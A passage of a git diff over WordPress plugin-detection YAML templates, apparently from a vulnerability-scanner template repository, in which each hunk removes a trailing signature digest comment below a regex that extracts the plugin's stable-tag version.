a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033a27dbbabaadfe7ff72de50055afae36a553fbeb8d11d669a1cb9e3b22bed6c022100fd9bdef3add36dbc86df1ada94d76e25e308d93c9387c28537c16fe424d9f39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index de5365ca2b..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9671e305cce97a774de0a4b497768605e43ee05cdcb580cbe28edb11d7ead31022100e232d045f36953a0a7f5a23bd59061d4ed2bf225259d80ff91a8c38fa4cc1ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 4f9698539f..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015258f7181bb68342ee1c074e39e817d8d6de2791b11db586da35e8d5f4b3d99022100e33c638bba745fce67adb9d7930eddd4ff322eaea1ef15591636886e83948bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index c6638714b6..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ecea0361a9d986e5a95f3ae8a56ddae4c2324f76813a325eff1a792524d9b04022100a0a54a4dc154fbf9116a800fd7205aa6ce9545b031ff9d0218f222308c9a65c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 870571446c..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220488fd632bfcbd7d7d50065e48f6e3f2c0cbe4a62a93a4a3df51b34210b6ae2ea02200411c4cd5e15b4a6236633a9df26d7b97036bbf87647490aaf377c952935e6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 6efe7db559..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220518f035850ca543735b4e8797b9ae69f2b70e9ba8c432ade3c5746b920e34df4022100e6b87a9907f670cbefca091034811314fbb9e97a79726ff420b204391090ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 9528a029eb..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008feb936d6422c1b20a90712247a8cb5f56c2ac1096f9096873ab98d57c6c94d02201ba4bc05658c9a3fe292d995036c388d724483f195931315abb42724567d4274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 003e3ff7e7..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e420ac21ace234b7b99f1a308dba84ae49eb3a9bb5cb2caecda5b6d22f404b1022024f92dd8d7bc7152e11808ab6d718c8acbe3705689851f124b501602874766e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 2406bbccf2..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100932621fcca0890d21819d82ba4eb911388cccdbf837157bdd1919e9a3b9cad8f0221008199ed1043bff2c8462d31935ff0c9feebe7d8ae526b219a05d93e7fc305795d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 43a813cf20..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220345261ff009a0daac374b249b6371605bca28b6b2deb50d02c02b48fcb81058f022100d8ade242077dd77da23df4358f717372470b75b412f6519d66ff0f0909c985ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index af169498b8..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4b15ad01b11e22ef54de12fe5fd26e72db23e2ad2ad2a912fb87d3a72783ca80221009f0e45bec3acb3fcf7c5299191465b35c9c5ef644bc9614740d9030b1fa797fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 1a425d64d9..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031ec7feb63903ab7a0ee4d8b40617fa37765fcce06a2001a289a0d1cf9ec93500220397c72155438553e56fbf5eb28ede6bd0837c51f4503c1ad3f930c8cf124a382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 2adaa14ea1..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa6516df2fe1fe5a120053d8d2c1682100b83a00182f46f5fa455b1c3dd5f22002207ecb51e2a5b5c17e92b44b38f9eab8cd5899d2081b1be0bcfa680d30857b7349:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 6f7ea673c0..d94b4228a9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c4176a7169f4d77412a3e403c9e8a228180ef681c5284c7f34bfd4995136cc0022002973c046508abd859db14034bf981df7bb802e1b4cab7efa3afaef771d98a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 08da13fdcc..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d20bb0a5a67b1fc871927e94341ae7978dcfa5c7e646a688cfc99b65a357d528022036dade3914a556ab2bc69c0bf0080526a5a579dccc96c2f79ff898271a65a475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 3ce72b2c49..c2cd4ede1b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012c59678fcca45c6cc22c23889171eab2c283d7ae46be598b7822bcb7301912302206c2517e2abc313b44f6e555438b6a5d28098c276c7a7c437a5674a3132b70a42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index b3d0710d34..03e6c13ec5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ec34348f5229ba50a3385f8de763e038c062c7b9894b0d765f3a30450dd38a30221008aa2572103d3891f38911f402b3fc736ab13c107736573a9e6b3ea7c68399991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a22e76e461..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e470cbda9568b0cca3811c39d6ae47be5fb07256b1a3d057a61835fb328f0bfe02207db5afc7ba7aaa50bde452f4bb95975ba723926d4d5645e27666103620fb869b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index edc13938bc..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb293b348b090f93b846ee4cc50a59789f706398e5ebd45964a26cfbb6a801140220611d755d2ef7ff95064cb7e0b9e5b64e5d5ba8224454b89f41ae6aa4e97d632d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index bf88acafb0..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092c1f07225569a1c14ae1c90c7a6ef80f2b4153a3712a1cf7d8660296b54dcb9022100df9981adb522f7f0753180c5d9e1d2f3a7f98f7eacd1562285065620dd0d0d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index cea63c9e36..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f6a7c1dd3b4fcee7c98fb7969ccdb5c14c13db36838724e765b1b68174bde800220251bd646725588404d39804ea0245122c8395581fb3a25842d6a4571693d9fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a3fe008670..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014b6e742e6ecdba5935e52121e01bd58d1cf01e7d05c52fafa3fac7a63a5ac3202202980b493a08e17961be0f351f49c4fdacbef82403632807edd3ec80dde0b1308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 8441c8fa1a..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022007c35f31adaf71086ac251053e25a0e5e83d57ca382dc5899d7bd9c3c29d82f8022100fbc1e0d65fe346366ae0d4cda5232dee9e14718f5eda6d11488a7ba66adc1c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a89f893818..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207727eb4f9e0b9ad29fca15f0d522aa7afe902131b4055639e230a803a1561f81022100a474d9c8e4be7ae593292733c35cc6d48514493beb483298b553701007e79d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 85d4292b43..d74de07e8e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab1f89e6f35bf69b950e8b4c3439a2f0348043e05752bc60e283cbf8192d2599022100851f7e7927795bfa104caf39b5c7ec4cad0d72d7c3b87133a5c63a33acef1751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 4d45cacd5e..e5cfe47925 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e07bc0a30d1ebff3917f2b8c83af1484a8c6ab16819afc26eb9d773cad814c86022031beff78fb9c7b620745c8a32430f532a5b3ec99ea532a428167b628d3a40375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 255d54e5f2..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f8a02dc992a2c45dc151bf5a13df5e0da0537c50b3e9bbd4d592872d5797857022075a788f2f64b1fb2e6de314ebea6c38d8e397b42b5a747b2b1a5b56209a1f163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index eb5873d150..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0c3a3f33039e6e1e4258c0824eb2678df89cf50dfc0669724bac790c141303e022016dc7037d772ea20acdd4ec7887320bac173117a0ee46a1756ff802fec54b5bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index e6dd3f440e..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f331775126ee5f7d2d2f20b7d058e4093becd686dc1dbc9279a7aa57c0151e9b0221009c9dfd31cff6b0b8b52e2053e7fccb5c8f38d5766bb4eebca9990550505c1ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index b6e9370962..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220412846260e088dacdf9103341fbf388c2b600facd97c7b5406a486425fc6522602200d74134ad2ae51443677658aea9ef7c49a9db0ad27f9a52278fb68c9fb01ea0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index fc400f571a..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220253d96119370a5c1a2cd5603d6bd9d1ae16aefceb7cfbc3ccf58e0ff9556d8c9022100dfc01aeb916cd8838227cba363576cf8ae68bc5154a699ea0a543c2211ea2e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 853f29a056..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028c73ed7769ea8b80a93f5474cc528906bd0e853dbc8f465f9a1f19c1c77e7530221008a8d9165b4e7f0bde65b71c88134b73eafe9aae7707c63b413cd4836ecaaff6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index ab8a057bde..d86e0557ae 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce62ab0626fe781189181180018157e932dd661a9333a4f7c294fd7a7624c01002204b7a61e97b7a04e7cff004e179e13c60a092f9d94967152001f413bd8da4e4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 1cfafae6ef..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea0603da5d106cd71fd4ce0476f4fd920c88f24613a76cfba39d1575a0015920220748c67fa6bcf069464c14bc0fb8a6dada22252b50550d1cbc8161726e24087ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 481765f2b1..4ae34395fa 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acde90ee1e88e4e3c99fd96e9c42add90a331fd7b457645504b18dbb12c16510022100c2de4dcb47dcaf2ef6ed84bfecf533b68e611d2a3b02804d6215d3510cdc9273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index de2d809fd5..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb6066264b8c92216d88ef35ba93b5fdecb257e90e494382a4bf1f7e606af05e022042f60fdb29e6f2e786caf295710bcfca3c022e857efb2fbd632bf77d7300b657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 1c184b9b3d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c45635126f2a3d02f12184f25cb6e8c63ce366f8f81a72b1809da41c6076617302203196b534b0446868474984dd42c38cc49318c8615ec119f2b883b733ca119e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c0a896585b..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220210a2b74503b0371850692209c3f88aab154f365f2ad0c147c6a3128775b38560220515534e0c862af60b5841db4b617bdba8b5d757be6284c47ef01e9f12636c8f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 4f7f87a964..aa36122d85 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205cb232383363732bb3f083957681f5c90a108da3628f65d2500912d633dd66fe0220766b82d4ea28038d2be91c3fb43beb28b2670c3196f18e7f710447e0a9333ab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a2b5d194f2..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220198d02ca10ad9d3d7d5993a732251568a5788b96053ea14d6cf1fdc7f06a6e5802210081a86395693ca4bdd8c344433802d5d02f163ae00704a58fe86c3922d2760d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 94e4dbd785..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a06395f054fb0f539d1f6ff1e9125f735f62133eb9e3e95dbd4c3b90c16e53d02200565f05d6eb3487d5afb5d0da3d82e93fc3455be20b3715970d78905d511685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 17f7535d09..1d00a5705d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8f74d782e034499e372d3543d3c86b33fca891c4d97199a13197cebdd853e8502201ed264721edd7775e738f06ffeefe5222293ec3b4744117f9b0484c8650ef8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 9b6c225ce6..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001e83287c30ceda0dad7760bdaff5707a29a737e70c7cc244e8c523d260c2ff1022100946558f2222156827487f330c8de5255145089f38b747b8a02604cc98825ebce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index dbeaa28d03..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204f4d547a67bf5f79393872c840e78ae5ab666ed34ad719f18bac3e763c4c110c022100cadd4069aadd887e9ffb9f2ec7a563be95c6cc2e5e114ec379b96177103f3bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 27050fcef8..3dbb03067b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044aaa81f67f6c878e943351b85a1c5d25c5d0545c95cd85ef81e3a0877e85349022023f736dfb8cf7696a586116e7904174dbeb111efe78ceff05b35c598aa99ccf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2f32f53226..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc7c7e7503083c44393a3f2d73f2d5c1c043263403c7a2715ffb50ee4842e7fa02203139f245c5ebf7bb1b6442f4f6f63c5244ac638e19bd270112300905e297e063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 80679fb0ba..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dda25dc4498cd9c822d894cfcde2bab202c1d9196e96ea4da2232d198992d3b60221008ad164f0989a8ee5d6ffc76b116ef30ab281c009024de5fadc03e2d8e2d57eed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml 